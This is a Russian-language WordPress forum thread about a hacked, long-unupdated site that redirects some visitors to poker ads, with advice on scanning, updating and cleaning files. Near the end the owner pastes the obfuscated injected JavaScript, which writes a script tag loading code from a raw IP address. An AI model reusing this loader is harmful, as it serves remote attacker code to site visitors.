Модератор
Yui
(@fierevere)
永子
тему для вордпресс откуда брали?
дело в том, что последняя тема установлена уже несколько лет, но подобного никогда не было.
Модератор
Yui
(@fierevere)
永子
тема обновлялась или все несколько лет без обновления?
https://www.revisium.com/ai/
можете айболитом проверить
или даже сайт свой проверить обычным антивирусом скачав файлы себе
Тема — Parabola, никогда не обновлялась, дело в том, что даже плагины новые не устанавливались давно.
Началось с того, что при входе в админку, после ввода логина — пароля — нажатия кнопки войти — переход на этот самый покерматч… а потом люди начали писать что вместо сайта — реклама, но если сделать рефреш страницы — то снова сайт… Более того — это не во всех странах, а только в Англии, Германии и Украине… У остальных сайт работает нормально…
никогда не обновлялась, дело в том, что даже плагины новые не устанавливались давно.
Тогда ничего удивительного. что сайт взломали.
И даже если найдёте зловреда, то уязвимости, которыми воспользовались злоумышлении никуда не денутся.
То есть обновление уже и не поможет?
Модератор
Yui
(@fierevere)
永子
перезапись инфицированых файлов возможно поможет
но не дает гарантию того, что весь вредный код будет очищен при этом
Обновил, файлы перезаписались, вот жду, что снова реклама у кого-то вылезет или не вылезет.
Обновил, файлы перезаписались,
Лучше удалить старье и залить новое. Тк в старом могут остаться файлы, которых в новых версиях нет. Также убедиться, что все компоненты — свежие и совместимые с текущей версией ВП. Наверняка ж некоторые уже мёртвые и последнее обновление было неск лет назад. Вы на него и обновили.
Кроме того — само обновление вряд ли удалило вирус. Выше Вам давали ссылку на ай-болит-а. Проверьте сайт им в пароноидальном режиме. Проверьте хтацессы (все которые найдутся), индекс(ы), подозрительные файлы, которых нет в дистрибутиве ВП и тп.
-
Ответ изменён 7 лет, 6 месяцев назад пользователем SeVlad.
не факт, кстати, что поломали именно сайт — иногда ломают браузер клиента.
Я об этом думал, но есть одно но, только в трех странах….
иногда ломают браузер клиента.
Ну справедливости ради — чаще браузер не «ломают», а юзеры наставят в него всяких мутных аддонов и потом имеют проблемы, но не подозревают о возможности создания разных профилей браузера.
Но в данном случае я лично уверен, что проблема из-за древности. Далеко ходить не будем.
ЗЫ. И ещё не известно — тема взята в репо или на какой-нить помойке.
-
Ответ изменён 7 лет, 6 месяцев назад пользователем SeVlad.
Нашел коды, они во многих JS файлах, + какие-то zip папки в директории, удаляю папки, удаляю их код с htaccess, — 5 минут, и снова папки на месте и htaccess изменен… Где копать?
Спасибо!
Модератор
Yui
(@fierevere)
永子
js на сервере не выполняется, ищите в php файлах,
сайт на время лечения желательно отключить, раз реинфицирование происходит так быстро
Нашел и в файлах php, (такая зараза —
[«»,»\x6A\x6F\x69\x6E»,»\x72\x65\x76\x65\x72\x73\x65″,»\x73\x70\x6C\x69\x74″,»\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C»,»\x77\x72\x69\x74\x65″];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))»)
А как можно сайт временно отключить?
Спасибо!